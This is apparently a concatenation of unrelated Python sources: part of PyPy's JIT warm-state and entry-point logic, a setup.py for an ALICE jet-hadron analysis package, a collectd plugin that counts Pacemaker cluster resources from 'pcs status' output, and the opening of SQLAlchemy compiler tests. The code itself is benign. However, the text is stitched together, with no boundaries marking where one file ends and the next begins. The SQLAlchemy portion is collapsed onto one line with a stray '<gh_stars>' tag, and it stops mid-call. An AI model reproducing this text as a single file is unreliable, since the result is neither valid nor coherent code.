        debug_start("jit-disableinlining")
        loc = self.get_location_str(greenkey)
        debug_print("disabled inlining", loc)
        debug_stop("jit-disableinlining")

    def attach_procedure_to_interp(self, greenkey, procedure_token):
        # Publish a freshly compiled procedure for this greenkey, redirecting
        # any previously attached procedure to the new one.
        cell = self.jit_cell_at_key(greenkey)
        old_token = cell.get_procedure_token()
        cell.set_procedure_token(procedure_token)
        cell.counter = -1       # valid procedure bridge attached
        if old_token is not None:
            self.cpu.redirect_call_assembler(old_token, procedure_token)
            # procedure_token is also kept alive by any loop that used
            # to point to old_token.  Actually freeing old_token early
            # is a pointless optimization (it is tiny).
            old_token.record_jump_to(procedure_token)

    # ----------

    def make_entry_point(self):
        "NOT_RPYTHON"
        # Build (once) and cache the closures that form the JIT's entry
        # point: maybe_compile_and_run and execute_assembler.
        if hasattr(self, 'maybe_compile_and_run'):
            return self.maybe_compile_and_run

        warmrunnerdesc = self.warmrunnerdesc
        metainterp_sd = warmrunnerdesc.metainterp_sd
        jitdriver_sd = self.jitdriver_sd
        vinfo = jitdriver_sd.virtualizable_info
        index_of_virtualizable = jitdriver_sd.index_of_virtualizable
        num_green_args = jitdriver_sd.num_green_args
        get_jitcell = self.make_jitcell_getter()
        self.make_jitdriver_callbacks()
        confirm_enter_jit = self.confirm_enter_jit
        range_red_args = unrolling_iterable(
            range(num_green_args, num_green_args + jitdriver_sd.num_red_args))
        # get a new specialized copy of the method
        ARGS = []
        for kind in jitdriver_sd.red_args_types:
            if kind == 'int':
                ARGS.append(lltype.Signed)
            elif kind == 'ref':
                ARGS.append(llmemory.GCREF)
            elif kind == 'float':
                ARGS.append(longlong.FLOATSTORAGE)
            else:
                assert 0, kind
        func_execute_token = self.cpu.make_execute_token(*ARGS)
        cpu = self.cpu

        def execute_assembler(loop_token, *args):
            # Call the backend to run the 'looptoken' with the given
            # input args.
            deadframe = func_execute_token(loop_token, *args)
            #
            # If we have a virtualizable, we have to reset its
            # 'vable_token' field afterwards
            if vinfo is not None:
                virtualizable = args[index_of_virtualizable]
                virtualizable = vinfo.cast_gcref_to_vtype(virtualizable)
                vinfo.reset_vable_token(virtualizable)
            #
            # Record in the memmgr that we just ran this loop,
            # so that it will keep it alive for a longer time
            warmrunnerdesc.memory_manager.keep_loop_alive(loop_token)
            #
            # Handle the failure
            fail_descr = cpu.get_latest_descr(deadframe)
            fail_descr.handle_fail(deadframe, metainterp_sd, jitdriver_sd)
            #
            # handle_fail() is expected to raise; reaching here is a bug
            assert 0, "should have raised"

        def bound_reached(cell, *args):
            # bound reached, but we do a last check: if it is the first
            # time we reach the bound, or if another loop or bridge was
            # compiled since the last time we reached it, then decrease
            # the counter by a few percents instead.  It should avoid
            # sudden bursts of JIT-compilation, and also corner cases
            # where we suddenly compile more than one loop because all
            # counters reach the bound at the same time, but where
            # compiling all but the first one is pointless.
            curgen = warmrunnerdesc.memory_manager.current_generation
            curgen = chr(intmask(curgen) & 0xFF)    # only use 8 bits
            if we_are_translated() and curgen != cell.extra_delay:
                cell.counter = int(self.THRESHOLD_LIMIT * 0.98)
                cell.extra_delay = curgen
                return
            #
            if not confirm_enter_jit(*args):
                cell.counter = 0
                return
            # start tracing
            from rpython.jit.metainterp.pyjitpl import MetaInterp
            metainterp = MetaInterp(metainterp_sd, jitdriver_sd)
            # set counter to -2, to mean "tracing in effect"
            cell.counter = -2
            try:
                metainterp.compile_and_run_once(jitdriver_sd, *args)
            finally:
                # if tracing did not end in attach_procedure_to_interp()
                # (which sets counter = -1), reset to "cold"
                if cell.counter == -2:
                    cell.counter = 0

        def maybe_compile_and_run(threshold, *args):
            """Entry point to the JIT.  Called at the point with the
            can_enter_jit() hint.
            """
            # look for the cell corresponding to the current greenargs
            greenargs = args[:num_green_args]
            cell = get_jitcell(True, *greenargs)

            if cell.counter >= 0:
                # update the profiling counter
                n = cell.counter + threshold
                if n <= self.THRESHOLD_LIMIT:       # bound not reached
                    cell.counter = n
                    return
                else:
                    bound_reached(cell, *args)
                    return
            else:
                if cell.counter != -1:
                    assert cell.counter == -2
                    # tracing already happening in some outer invocation of
                    # this function. don't trace a second time.
                    return
                if not confirm_enter_jit(*args):
                    return
                # machine code was already compiled for these greenargs
                procedure_token = cell.get_procedure_token()
                if procedure_token is None:
                    # it was a weakref that has been freed
                    cell.counter = 0
                    return
                # extract and unspecialize the red arguments to pass to
                # the assembler
                execute_args = ()
                for i in range_red_args:
                    execute_args += (unspecialize_value(args[i]), )
                # run it! this executes until interrupted by an exception
                execute_assembler(procedure_token, *execute_args)
                #
                assert 0, "should not reach this point"

        maybe_compile_and_run._dont_inline_ = True
        self.maybe_compile_and_run = maybe_compile_and_run
        self.execute_assembler = execute_assembler
        return maybe_compile_and_run

    # ----------

    def make_unwrap_greenkey(self):
        "NOT_RPYTHON"
        # Build (once) a specialized closure that turns a greenkey (a list
        # of Const boxes) into a tuple of unwrapped values.
        if hasattr(self, 'unwrap_greenkey'):
            return self.unwrap_greenkey
        #
        jitdriver_sd = self.jitdriver_sd
        green_args_spec = unrolling_iterable(jitdriver_sd._green_args_spec)
        #
        def unwrap_greenkey(greenkey):
            greenargs = ()
            i = 0
            for TYPE in green_args_spec:
                greenbox = greenkey[i]
                assert isinstance(greenbox, history.Const)
                value = unwrap(TYPE, greenbox)
                greenargs += (value,)
                i = i + 1
            return greenargs
        #
        unwrap_greenkey._always_inline_ = True
        self.unwrap_greenkey = unwrap_greenkey
        return unwrap_greenkey

    # ----------

    def make_jitcell_getter(self):
        "NOT_RPYTHON"
        # Build (once) the greenargs -> JitCell getter, either the default
        # r_dict-backed one or the interpreter-provided custom one.
        if hasattr(self, 'jit_getter'):
            return self.jit_getter
        #
        if self.jitdriver_sd._get_jitcell_at_ptr is None:
            jit_getter = self._make_jitcell_getter_default()
        else:
            jit_getter = self._make_jitcell_getter_custom()
        #
        unwrap_greenkey = self.make_unwrap_greenkey()
        #
        def jit_cell_at_key(greenkey):
            greenargs = unwrap_greenkey(greenkey)
            return jit_getter(True, *greenargs)
        self.jit_cell_at_key = jit_cell_at_key
        self.jit_getter = jit_getter
        #
        return jit_getter

    def _make_jitcell_getter_default(self):
        "NOT_RPYTHON"
        # Default JitCell storage: an r_dict keyed on the green args with
        # specialized equality/hash, plus a rare decay-and-prune pass.
        jitdriver_sd = self.jitdriver_sd
        green_args_spec = unrolling_iterable(jitdriver_sd._green_args_spec)
        #
        def comparekey(greenargs1, greenargs2):
            i = 0
            for TYPE in green_args_spec:
                if not equal_whatever(TYPE, greenargs1[i], greenargs2[i]):
                    return False
                i = i + 1
            return True
        #
        def hashkey(greenargs):
            # tuple-hash combination, same scheme as CPython's tuple hash
            x = 0x345678
            i = 0
            for TYPE in green_args_spec:
                item = greenargs[i]
                y = hash_whatever(TYPE, item)
                x = intmask((1000003 * x) ^ y)
                i = i + 1
            return x
        #
        jitcell_dict = r_dict(comparekey, hashkey)
        try:
            self.warmrunnerdesc.stats.jitcell_dicts.append(jitcell_dict)
        except AttributeError:
            pass
        #
        def _cleanup_dict():
            # Decay all warm-up counters by 8% and drop cells that became
            # both cold and procedure-less.
            minimum = self.THRESHOLD_LIMIT // 20     # minimum 5%
            killme = []
            for key, cell in jitcell_dict.iteritems():
                if cell.counter >= 0:
                    cell.counter = int(cell.counter * 0.92)
                    if cell.counter < minimum:
                        killme.append(key)
                elif (cell.counter == -1
                      and cell.get_procedure_token() is None):
                    killme.append(key)
            for key in killme:
                del jitcell_dict[key]
        #
        def _maybe_cleanup_dict():
            # Once in a while, rarely, when too many entries have
            # been put in the jitdict_dict, we do a cleanup phase:
            # we decay all counters and kill entries with a too
            # low counter.
            self._trigger_automatic_cleanup += 1
            if self._trigger_automatic_cleanup > 20000:
                self._trigger_automatic_cleanup = 0
                _cleanup_dict()
        #
        self._trigger_automatic_cleanup = 0
        self._jitcell_dict = jitcell_dict      # for tests
        #
        def get_jitcell(build, *greenargs):
            try:
                cell = jitcell_dict[greenargs]
            except KeyError:
                if not build:
                    return None
                _maybe_cleanup_dict()
                cell = JitCell()
                jitcell_dict[greenargs] = cell
            return cell
        return get_jitcell

    def _make_jitcell_getter_custom(self):
        "NOT_RPYTHON"
        # Custom JitCell storage: the interpreter supplies get/set hooks
        # that store the cell on its own objects (e.g. PyCode in PyPy).
        rtyper = self.warmrunnerdesc.rtyper
        get_jitcell_at_ptr = self.jitdriver_sd._get_jitcell_at_ptr
        set_jitcell_at_ptr = self.jitdriver_sd._set_jitcell_at_ptr
        lltohlhack = {}
        # note that there is no equivalent of _maybe_cleanup_dict()
        # in the case of custom getters.  We assume that the interpreter
        # stores the JitCells on some objects that can go away by GC,
        # like the PyCode objects in PyPy.
        #
        def get_jitcell(build, *greenargs):
            fn = support.maybe_on_top_of_llinterp(rtyper, get_jitcell_at_ptr)
            cellref = fn(*greenargs)
            # <hacks> translated vs untranslated: map the low-level cell
            # reference back to the high-level JitCell instance
            if we_are_translated():
                BASEJITCELL = lltype.typeOf(cellref)
                cell = cast_base_ptr_to_instance(JitCell, cellref)
            else:
                if isinstance(cellref, (BaseJitCell, type(None))):
                    BASEJITCELL = None
                    cell = cellref
                else:
                    BASEJITCELL = lltype.typeOf(cellref)
                    if cellref:
                        cell = lltohlhack[rtyper.type_system.deref(cellref)]
                    else:
                        cell = None
            if not build:
                return cell
            if cell is None:
                cell = JitCell()
                # <hacks> store the new cell back through the set hook
                if we_are_translated():
                    cellref = cast_object_to_ptr(BASEJITCELL, cell)
                else:
                    if BASEJITCELL is None:
                        cellref = cell
                    else:
                        if isinstance(BASEJITCELL, lltype.Ptr):
                            cellref = lltype.malloc(BASEJITCELL.TO)
                        elif isinstance(BASEJITCELL, ootype.Instance):
                            cellref = ootype.new(BASEJITCELL)
                        else:
                            assert False, "no clue"
                        lltohlhack[rtyper.type_system.deref(cellref)] = cell
                # </hacks>
                fn = support.maybe_on_top_of_llinterp(rtyper,
                                                      set_jitcell_at_ptr)
                fn(cellref, *greenargs)
            return cell
        return get_jitcell

    # ----------

    def make_jitdriver_callbacks(self):
        # Build (once) the per-jitdriver callback closures wrapping the
        # optional user-supplied hook pointers with sensible defaults.
        if hasattr(self, 'get_location_str'):
            return
        #
        warmrunnerdesc = self.warmrunnerdesc
        unwrap_greenkey = self.make_unwrap_greenkey()
        jit_getter = self.make_jitcell_getter()
        jd = self.jitdriver_sd
        cpu = self.cpu

        def can_inline_greenargs(*greenargs):
            if can_never_inline(*greenargs):
                return False
            cell = jit_getter(False, *greenargs)
            if cell is not None and cell.dont_trace_here:
                return False
            return True
        def can_inline_callable(greenkey):
            greenargs = unwrap_greenkey(greenkey)
            return can_inline_greenargs(*greenargs)
        self.can_inline_greenargs = can_inline_greenargs
        self.can_inline_callable = can_inline_callable

        if jd._should_unroll_one_iteration_ptr is None:
            def should_unroll_one_iteration(greenkey):
                return False
        else:
            rtyper = self.warmrunnerdesc.rtyper
            inline_ptr = jd._should_unroll_one_iteration_ptr
            def should_unroll_one_iteration(greenkey):
                greenargs = unwrap_greenkey(greenkey)
                fn = support.maybe_on_top_of_llinterp(rtyper, inline_ptr)
                return fn(*greenargs)
        self.should_unroll_one_iteration = should_unroll_one_iteration

        # one character per red arg kind, e.g. 'i', 'r', 'f'
        redargtypes = ''.join([kind[0] for kind in jd.red_args_types])

        def get_assembler_token(greenkey):
            # Return the compiled procedure for this greenkey, compiling a
            # temporary placeholder callback if none exists yet.
            cell = self.jit_cell_at_key(greenkey)
            procedure_token = cell.get_procedure_token()
            if procedure_token is None:
                from rpython.jit.metainterp.compile import compile_tmp_callback
                if cell.counter == -1:    # used to be a valid entry bridge,
                    cell.counter = 0      # but was freed in the meantime.
                memmgr = warmrunnerdesc.memory_manager
                procedure_token = compile_tmp_callback(cpu, jd, greenkey,
                                                       redargtypes, memmgr)
                cell.set_procedure_token(procedure_token)
            return procedure_token
        self.get_assembler_token = get_assembler_token

        #
        get_location_ptr = self.jitdriver_sd._get_printable_location_ptr
        if get_location_ptr is None:
            missing = '(no jitdriver.get_printable_location!)'
            def get_location_str(greenkey):
                return missing
        else:
            rtyper = self.warmrunnerdesc.rtyper
            unwrap_greenkey = self.make_unwrap_greenkey()
            #
            def get_location_str(greenkey):
                greenargs = unwrap_greenkey(greenkey)
                fn = support.maybe_on_top_of_llinterp(rtyper,
                                                      get_location_ptr)
                llres = fn(*greenargs)
                if not we_are_translated() and isinstance(llres, str):
                    return llres
                return hlstr(llres)
        self.get_location_str = get_location_str
        #
        confirm_enter_jit_ptr = self.jitdriver_sd._confirm_enter_jit_ptr
        if confirm_enter_jit_ptr is None:
            def confirm_enter_jit(*args):
                return True
        else:
            rtyper = self.warmrunnerdesc.rtyper
            #
            def confirm_enter_jit(*args):
                fn = support.maybe_on_top_of_llinterp(rtyper,
                                                      confirm_enter_jit_ptr)
                return fn(*args)
        self.confirm_enter_jit = confirm_enter_jit
        #
        can_never_inline_ptr = self.jitdriver_sd._can_never_inline_ptr
        if can_never_inline_ptr is None:
            def can_never_inline(*greenargs):
                return False
        else:
            rtyper = self.warmrunnerdesc.rtyper
            #
            def can_never_inline(*greenargs):
                fn = support.maybe_on_top_of_llinterp(rtyper,
                                                      can_never_inline_ptr)
                return fn(*greenargs)
        self.can_never_inline = can_never_inline
#!/usr/bin/env python
# NOTE: shebang fixed — it was '#/usr/bin/env python' (missing '!'), which
# makes the file non-executable as a script.

# Setup Jet-H analysis
# Derived from the setup.py in aliBuild and Overwatch
# and based on: https://python-packaging.readthedocs.io/en/latest/index.html

# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
import os
from typing import Any, cast, Dict

# Anchor all file reads on the directory containing this setup.py so that
# the build works regardless of the current working directory.
here = os.path.abspath(os.path.dirname(__file__))

def get_version() -> str:
    """Read ``__version__`` out of jet_hadron/version.py without importing
    the package (importing could pull in heavy dependencies).

    Returns:
        The package version string.
    """
    version_module: Dict[str, Any] = {}
    # Anchored on `here` (previously cwd-relative, which broke when pip
    # built from another directory).
    with open(os.path.join(here, "jet_hadron", "version.py")) as f:
        exec(f.read(), version_module)
    return cast(str, version_module["__version__"])

# Get the long description from the README file
with open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()

setup(
    name="alice_jet_hadron_correlations",
    version=get_version(),
    description="ALICE jet-hadron correlations analysis",
    long_description=long_description,
    long_description_content_type="text/markdown",

    author="<NAME>",
    author_email="<EMAIL>",

    url="https://github.com/raymondEhlers/alice-jet-hadron",
    license="BSD 3-Clause",

    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        #   3 - Alpha
        #   4 - Beta
        #   5 - Production/Stable
        'Development Status :: 4 - Beta',

        # Indicate who your project is intended for
        'Intended Audience :: Science/Research',

        # Specify the Python versions you support here. In particular, ensure
        # that you indicate whether you support Python 2, Python 3 or both.
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7'
    ],

    # What does your project relate to?
    keywords='HEP ALICE',

    packages=find_packages(exclude=(".git", "tests")),

    # Rename scripts to the desired executable names
    # See: https://stackoverflow.com/a/8506532
    entry_points = {
        "console_scripts": [
            "jetHCorrelations = jet_hadron.analysis.correlations:run_from_terminal",
            "jetHResponse = jet_hadron.analysis.response_matrix:run_from_terminal",
            "starResponse = jet_hadron.analysis.STAR_response_matrix:run_from_terminal",
            "plotEMCalCorrections = jet_hadron.analysis.EMCal_analysis_tasks:run_plot_EMCal_corrections_hists_from_terminal",
            "plotEMCalEmbedding = jet_hadron.analysis.EMCal_analysis_tasks:run_plot_EMCal_embedding_hists_from_terminal",
            "plotRPFRegions = jet_hadron.plot.highlight_RPF:run_from_terminal",
            "mixedEventSystematics = jet_hadron.analysis.systematics:run_mixed_event_systematics_from_terminal",
        ],
    },

    # This is usually the minimal set of the required packages.
    # Packages should be installed via pip -r requirements.txt !
    install_requires=[
        # Pinned version because the typing information doesn't seem right,
        # at least with how I understand it.
        "ruamel.yaml<0.15.99",
        "IPython",
        "scipy",
        "numpy",
        "matplotlib",
        "seaborn",
        "numdifftools",
        "pachyderm<3.0",
        "reaction_plane_fit>3.1",
        "coloredlogs",
        "enlighten",
        "numpythia",
        "pyjet",
        "joblib",
    ],

    # Include additional files
    include_package_data=True,

    extras_require = {
        "tests": [
            "pytest",
            "pytest-cov",
            "pytest-mock",
            "codecov",
        ],
        "docs": [
            "sphinx",
            # Allow markdown files to be used
            "recommonmark",
            # Allow markdown tables to be used
            "sphinx_markdown_tables",
        ],
        "dev": [
            "pre-commit",
            "flake8",
            # Makes flake8 easier to parse
            "flake8-colors",
            "mypy",
            "yamllint",
        ]
    }
)
# collectd read plugin: scrapes `pcs status` output (written by a sidecar
# that listens on PIPE_FILE_PATH and logs to LOG_FILE_PATH) and dispatches
# pacemaker cluster health metrics as gauges.
import collectd
import os

# Log file into which the container sidecar writes the `pcs status` output.
LOG_FILE_PATH = '/var/log/containers/stdouts/collectd_pacemaker.out'
# Named pipe used to ask the sidecar to run `pcs status`.
PIPE_FILE_PATH = '/collectd_pipe'
# Default collection interval in seconds; overridable via plugin config.
INTERVAL = 15


def config_func(config):
    # collectd configuration callback: only the 'Interval' key is honored.
    # NOTE(review): `log_file_path_set` is assigned but never used — looks
    # like a leftover from a removed LogFilePath option.
    log_file_path_set = False
    for node in config.children:
        key = node.key.lower()
        if key == 'interval':
            global INTERVAL
            INTERVAL = int(node.values[0])


def read_func():
    # collectd read callback: trigger a fresh `pcs status`, parse the most
    # recent status block out of the log, and dispatch one gauge per
    # component in components_list.
    global INTERVAL
    global LOG_FILE_PATH
    # Ask the sidecar (reading the pipe) to append a new `pcs status` dump.
    os.system('''echo "pcs status" > '''+PIPE_FILE_PATH)
    with open(LOG_FILE_PATH, 'rb') as f:
        full_output = [line.decode("utf-8") for line in f.readlines()]
    # Walk backwards until the start of the latest status block; the
    # resulting `latest_output` holds that block in reverse order, so the
    # parsers below iterate it with [-1::-1] to read chronologically.
    latest_output = []
    for line in full_output[-1::-1]:
        latest_output.append(line)
        if "Cluster name:" in line:
            break
    components_list = ["total_nodes", "online_nodes", "online_guests",
                       "resource_instances",
                       "haproxy_resource_total_count",
                       "galera_resource_total_count",
                       "rabbitmq_resource_total_count",
                       "redis_resource_total_count",
                       "ovn_resource_total_count",
                       "cinder_resource_total_count",
                       "haproxy_resource_master_count",
                       "galera_resource_master_count",
                       "rabbitmq_resource_master_count",
                       "redis_resource_master_count",
                       "ovn_resource_master_count",
                       "cinder_resource_master_count",
                       "corosync_daemon_status", "pacemaker_daemon_status",
                       "pcsd_daemon_status",
                       "haproxy_resource_failures",
                       "galera_resource_failures",
                       "rabbitmq_resource_failures",
                       "redis_resource_failures",
                       "ovn_resource_failures",
                       "cinder_resource_failures"]
    # NOTE(review): `val` is only assigned when a pattern matches; if the
    # very first component's pattern is absent from the output this raises
    # NameError at dispatch time, and later components can silently reuse a
    # stale `val` from a previous iteration — confirm intended behavior.
    for component in components_list:
        if component == "total_nodes":
            for line in latest_output[-1::-1]:
                if "nodes configured" in line:
                    line_split = line.split()
                    nodes_index = line_split.index("nodes")
                    val = int(line_split[nodes_index-1])
                    break
        elif component == "online_nodes":
            for line in latest_output[-1::-1]:
                if "Online: [" in line and "Guest" not in line:
                    line_split = line.split("[")[1].replace(" ]","").strip().split()
                    val = int(len(line_split))
        elif component == "online_guests":
            for line in latest_output[-1::-1]:
                if "GuestOnline: [" in line:
                    line_split = line.split("[")[1].replace(" ]","").strip().split()
                    val = int(len(line_split))
        elif component == "resource_instances":
            for line in latest_output[-1::-1]:
                if "resource instances configured" in line:
                    line_split = line.split()
                    nodes_index = line_split.index("resource")
                    val = int(line_split[nodes_index-1])
        elif "resource_total_count" in component:
            resource = component.split("_")[0]
            val = 0
            # Flag to make sure that failures are not counted
            # in resource total count.
            is_failures_total = False
            for line in latest_output[-1::-1]:
                if "Failed" in line:
                    is_failures_total = True
                if (resource == "haproxy" or resource == "galera" or
                        resource == "rabbitmq" or resource == "redis"):
                    if resource+"-bundle-" in line and "Guest" not in line and not is_failures_total:
                        val += 1
                if resource == "ovn":
                    if "ovn-dbs-bundle-" in line and "Guest" not in line and not is_failures_total:
                        val += 1
                if resource == "cinder":
                    if "openstack-cinder-volume-" in line and "Guest" not in line and not is_failures_total:
                        val += 1
                # "Daemon Status" marks the end of the failed-actions section
                if is_failures_total and "Daemon Status" in line:
                    is_failures_total = False
        elif "resource_master_count" in component:
            resource = component.split("_")[0]
            val = 0
            # Flag to make sure that failures are not counted
            # in resource master count
            is_failures_master = False
            for line in latest_output[-1::-1]:
                if "Failed" in line:
                    is_failures_master = True
                if (resource == "haproxy" or resource == "galera" or
                        resource == "rabbitmq" or resource == "redis"):
                    if resource+"-bundle-" in line and "Master" in line and not is_failures_master:
                        val += 1
                if resource == "ovn":
                    if "ovn-dbs-bundle-" in line and "Master" in line and not is_failures_master:
                        val += 1
                if resource == "cinder":
                    if "openstack-cinder-volume-" in line and "Master" in line and not is_failures_master:
                        val += 1
                if is_failures_master and "Daemon Status" in line:
                    is_failures_master = False
        # NOTE(review): the next two branches are plain `if` (not `elif`), so
        # they re-check components already handled above; harmless today
        # because the name sets are disjoint, but fragile — confirm.
        if "daemon_status" in component:
            daemon = component.split("_")[0]
            val = 0
            for line in latest_output:
                if daemon+":" in line and "active/enabled" in line:
                    val = 1
                    break
        if "resource_failures" in component:
            resource = component.split("_")[0]
            val = 0
            is_failures = False
            for line in latest_output[-1::-1]:
                if "Failed" in line:
                    is_failures = True
                if resource in line and is_failures:
                    val += 1
                if is_failures and "Daemon Status" in line:
                    is_failures = False
        # Dispatch the parsed value as a gauge under
        # plugin=pacemaker_monitoring, type_instance=<component>.
        metric = collectd.Values()
        metric.plugin = 'pacemaker_monitoring'
        metric.interval = INTERVAL
        metric.type = 'gauge'
        metric.type_instance = component
        metric.values = [val]
        metric.dispatch()


collectd.register_config(config_func)
collectd.register_read(read_func)
<gh_stars>0 #! coding:utf-8 """ compiler tests. These tests are among the very first that were written when SQLAlchemy began in 2005. As a result the testing style here is very dense; it's an ongoing job to break these into much smaller tests with correct pep8 styling and coherent test organization. """ import decimal from sqlalchemy import alias from sqlalchemy import and_ from sqlalchemy import asc from sqlalchemy import bindparam from sqlalchemy import Boolean from sqlalchemy import case from sqlalchemy import cast from sqlalchemy import CheckConstraint from sqlalchemy import Column from sqlalchemy import Date from sqlalchemy import desc from sqlalchemy import distinct from sqlalchemy import exc from sqlalchemy import except_ from sqlalchemy import exists from sqlalchemy import Float from sqlalchemy import func from sqlalchemy import Integer from sqlalchemy import intersect from sqlalchemy import join from sqlalchemy import literal from sqlalchemy import literal_column from sqlalchemy import MetaData from sqlalchemy import not_ from sqlalchemy import null from sqlalchemy import Numeric from sqlalchemy import or_ from sqlalchemy import outerjoin from sqlalchemy import over from sqlalchemy import schema from sqlalchemy import select from sqlalchemy import Sequence from sqlalchemy import sql from sqlalchemy import String from sqlalchemy import subquery from sqlalchemy import Table from sqlalchemy import Text from sqlalchemy import text from sqlalchemy import TIMESTAMP from sqlalchemy import true from sqlalchemy import tuple_ from sqlalchemy import type_coerce from sqlalchemy import types from sqlalchemy import union from sqlalchemy import union_all from sqlalchemy import util from sqlalchemy.dialects import mysql from sqlalchemy.dialects import oracle from sqlalchemy.dialects import postgresql from sqlalchemy.dialects import sqlite from sqlalchemy.dialects import sybase from sqlalchemy.dialects.postgresql.base import PGCompiler from 
sqlalchemy.dialects.postgresql.base import PGDialect from sqlalchemy.engine import default from sqlalchemy.ext.compiler import compiles from sqlalchemy.sql import column from sqlalchemy.sql import compiler from sqlalchemy.sql import label from sqlalchemy.sql import table from sqlalchemy.sql.expression import _literal_as_text from sqlalchemy.sql.expression import ClauseList from sqlalchemy.sql.expression import HasPrefixes from sqlalchemy.testing import assert_raises from sqlalchemy.testing import assert_raises_message from sqlalchemy.testing import AssertsCompiledSQL from sqlalchemy.testing import eq_ from sqlalchemy.testing import eq_ignore_whitespace from sqlalchemy.testing import fixtures from sqlalchemy.testing import is_ from sqlalchemy.util import u table1 = table( "mytable", column("myid", Integer), column("name", String), column("description", String), ) table2 = table( "myothertable", column("otherid", Integer), column("othername", String) ) table3 = table( "thirdtable", column("userid", Integer), column("otherstuff", String) ) metadata = MetaData() # table with a schema table4 = Table( "remotetable", metadata, Column("rem_id", Integer, primary_key=True), Column("datatype_id", Integer), Column("value", String(20)), schema="remote_owner", ) # table with a 'multipart' schema table5 = Table( "remotetable", metadata, Column("rem_id", Integer, primary_key=True), Column("datatype_id", Integer), Column("value", String(20)), schema="dbo.remote_owner", ) users = table( "users", column("user_id"), column("user_name"), column("password") ) addresses = table( "addresses", column("address_id"), column("user_id"), column("street"), column("city"), column("state"), column("zip"), ) keyed = Table( "keyed", metadata, Column("x", Integer, key="colx"), Column("y", Integer, key="coly"), Column("z", Integer), ) class SelectTest(fixtures.TestBase, AssertsCompiledSQL): __dialect__ = "default" def test_attribute_sanity(self): assert hasattr(table1, "c") assert 
hasattr(table1.select(), "c") assert not hasattr(table1.c.myid.self_group(), "columns") assert hasattr(table1.select().self_group(), "columns") assert not hasattr(table1.c.myid, "columns") assert not hasattr(table1.c.myid, "c") assert not hasattr(table1.select().c.myid, "c") assert not hasattr(table1.select().c.myid, "columns") assert not hasattr(table1.alias().c.myid, "columns") assert not hasattr(table1.alias().c.myid, "c") if util.compat.py32: assert_raises_message( exc.InvalidRequestError, "Scalar Select expression has no " "columns; use this object directly within a " "column-level expression.", lambda: hasattr( select([table1.c.myid]).as_scalar().self_group(), "columns" ), ) assert_raises_message( exc.InvalidRequestError, "Scalar Select expression has no " "columns; use this object directly within a " "column-level expression.", lambda: hasattr( select([table1.c.myid]).as_scalar(), "columns" ), ) else: assert not hasattr( select([table1.c.myid]).as_scalar().self_group(), "columns" ) assert not hasattr(select([table1.c.myid]).as_scalar(), "columns") def test_prefix_constructor(self): class Pref(HasPrefixes): def _generate(self): return self assert_raises( exc.ArgumentError, Pref().prefix_with, "some prefix", not_a_dialect=True, ) def test_table_select(self): self.assert_compile( table1.select(), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable", ) self.assert_compile( select([table1, table2]), "SELECT mytable.myid, mytable.name, mytable.description, " "myothertable.otherid, myothertable.othername FROM mytable, " "myothertable", ) def test_invalid_col_argument(self): assert_raises(exc.ArgumentError, select, table1) assert_raises(exc.ArgumentError, select, table1.c.myid) def test_int_limit_offset_coercion(self): for given, exp in [ ("5", 5), (5, 5), (5.2, 5), (decimal.Decimal("5"), 5), (None, None), ]: eq_(select().limit(given)._limit, exp) eq_(select().offset(given)._offset, exp) eq_(select(limit=given)._limit, exp) 
eq_(select(offset=given)._offset, exp) assert_raises(ValueError, select().limit, "foo") assert_raises(ValueError, select().offset, "foo") assert_raises(ValueError, select, offset="foo") assert_raises(ValueError, select, limit="foo") def test_limit_offset_no_int_coercion_one(self): exp1 = literal_column("Q") exp2 = literal_column("Y") self.assert_compile( select([1]).limit(exp1).offset(exp2), "SELECT 1 LIMIT Q OFFSET Y" ) self.assert_compile( select([1]).limit(bindparam("x")).offset(bindparam("y")), "SELECT 1 LIMIT :x OFFSET :y", ) def test_limit_offset_no_int_coercion_two(self): exp1 = literal_column("Q") exp2 = literal_column("Y") sel = select([1]).limit(exp1).offset(exp2) assert_raises_message( exc.CompileError, "This SELECT structure does not use a simple integer " "value for limit", getattr, sel, "_limit", ) assert_raises_message( exc.CompileError, "This SELECT structure does not use a simple integer " "value for offset", getattr, sel, "_offset", ) def test_limit_offset_no_int_coercion_three(self): exp1 = bindparam("Q") exp2 = bindparam("Y") sel = select([1]).limit(exp1).offset(exp2) assert_raises_message( exc.CompileError, "This SELECT structure does not use a simple integer " "value for limit", getattr, sel, "_limit", ) assert_raises_message( exc.CompileError, "This SELECT structure does not use a simple integer " "value for offset", getattr, sel, "_offset", ) def test_limit_offset(self): for lim, offset, exp, params in [ ( 5, 10, "LIMIT :param_1 OFFSET :param_2", {"param_1": 5, "param_2": 10}, ), (None, 10, "LIMIT -1 OFFSET :param_1", {"param_1": 10}), (5, None, "LIMIT :param_1", {"param_1": 5}), ( 0, 0, "LIMIT :param_1 OFFSET :param_2", {"param_1": 0, "param_2": 0}, ), ]: self.assert_compile( select([1]).limit(lim).offset(offset), "SELECT 1 " + exp, checkparams=params, ) def test_select_precol_compile_ordering(self): s1 = select([column("x")]).select_from(text("a")).limit(5).as_scalar() s2 = select([s1]).limit(10) class MyCompiler(compiler.SQLCompiler): def 
get_select_precolumns(self, select, **kw):
    # NOTE(review): fragment — the ``def`` of this method and its enclosing
    # custom-compiler class begin before this chunk.  It renders
    # FIRST/SKIP-style limit/offset (Firebird-like syntax — presumably; the
    # class header is not visible here) in the pre-column position.
    result = ""
    if select._limit:
        result += "FIRST %s " % self.process(literal(select._limit), **kw)
    if select._offset:
        result += "SKIP %s " % self.process(literal(select._offset), **kw)
    return result

def limit_clause(self, select, **kw):
    # limit/offset are emitted by get_select_precolumns instead, so the
    # trailing LIMIT clause is suppressed entirely.
    return ""

dialect = default.DefaultDialect()
dialect.statement_compiler = MyCompiler
dialect.paramstyle = "qmark"
dialect.positional = True
self.assert_compile(
    s2,
    "SELECT FIRST ? (SELECT FIRST ? x FROM a) AS anon_1",
    checkpositional=(10, 5),
    dialect=dialect,
)

def test_from_subquery(self):
    """tests placing select statements in the column clause of
    another select, for the purposes of selecting from the
    exported columns of that select."""

    s = select([table1], table1.c.name == "jack")
    self.assert_compile(
        select([s], s.c.myid == 7),
        "SELECT myid, name, description FROM "
        "(SELECT mytable.myid AS myid, "
        "mytable.name AS name, mytable.description AS description "
        "FROM mytable "
        "WHERE mytable.name = :name_1) WHERE myid = :myid_1",
    )

    sq = select([table1])
    self.assert_compile(
